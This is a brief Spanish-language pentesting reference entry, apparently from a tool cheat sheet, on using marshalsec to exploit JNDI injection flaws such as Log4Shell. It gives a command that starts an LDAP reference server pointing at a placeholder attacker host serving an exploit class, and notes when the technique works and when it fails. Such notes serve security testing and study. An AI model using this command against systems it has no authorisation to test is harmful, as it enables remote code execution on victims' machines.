marshalsec (JNDI/LDAP)
java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<attacker>/#Exploit"
Servidor LDAP/RMI para explotar vulnerabilidades JNDI (ej. Log4j) con referencias a código malicioso.
Cuando encuentras una vulnerabilidad de inyección JNDI, como Log4Shell (CVE-2021-44228) o en aplicaciones Java que usan JNDI con parámetros controlables. Marshalsec levanta un servidor LDAP que devuelve una referencia a un objeto remoto (clase Java) que puede ejecutar código. Es la forma estándar de explotar JNDI.
Si el objetivo tiene parcheado JNDI o usa filtros de deserialización. También si no tienes un servidor HTTP para alojar la clase exploit.